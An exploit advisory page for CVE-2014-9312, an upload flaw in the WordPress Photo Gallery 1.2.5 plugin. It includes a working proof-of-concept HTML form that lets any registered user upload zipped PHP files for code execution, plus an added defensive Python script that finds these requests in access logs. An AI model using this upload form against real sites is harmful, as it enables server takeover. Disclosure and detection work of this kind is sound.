WordPress Photo Gallery 1.2.5 Unrestricted File Upload Vulnerability

ID 1337DAY-ID-23199
Type zdt
Reporter Kacper Szurek
Modified 2015-01-26T00:00:00


Exploit for php platform in category web applications

# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps

1. Description
Any registered user (even a Subscriber) can access the upload functionality, because UploadHandler.php uses the read role for its access check and every registered user has it.

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register).

Pack the .php files into a .zip archive, then send it using:

<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>

Your files will be visible inside:

3. Solution:
Update to version 1.2.6
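
To check whether a site was hit before the update, the web server access log can be searched for POST requests to the upload action named in the proof of concept. The following is an added example, not part of the original advisory or the plugin's code; it assumes combined log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

AJAX_PATH = "/wp-admin/admin-ajax.php"
UPLOAD_ACTION = "bwg_UploadHandler"  # AJAX action name taken from the advisory


def find_upload_requests(lines):
    """Return one dict per POST to the Photo Gallery upload AJAX action."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        # endswith() also matches WordPress installed in a subdirectory
        if not url.path.endswith(AJAX_PATH):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        if UPLOAD_ACTION not in query.get("action", []):
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": int(m["status"]),
            "dir": query.get("dir", [""])[0],  # URL-decoded target directory
        })
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2014:10:01:22 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2345 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Nov/2014:10:03:10 +0000] "POST /wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/ HTTP/1.1" 200 187 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Nov/2014:10:04:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Nov/2014:10:05:41 +0000] "POST /blog/wp-admin/admin-ajax.php?dir=x%2F&action=bwg_UploadHandler HTTP/1.1" 403 12 "-" "curl/7.38"',
]

if __name__ == "__main__":
    for hit in find_upload_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a request that carries the action parameter in the POST body will not be matched by this check.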

#  0day.today [2018-01-05]  #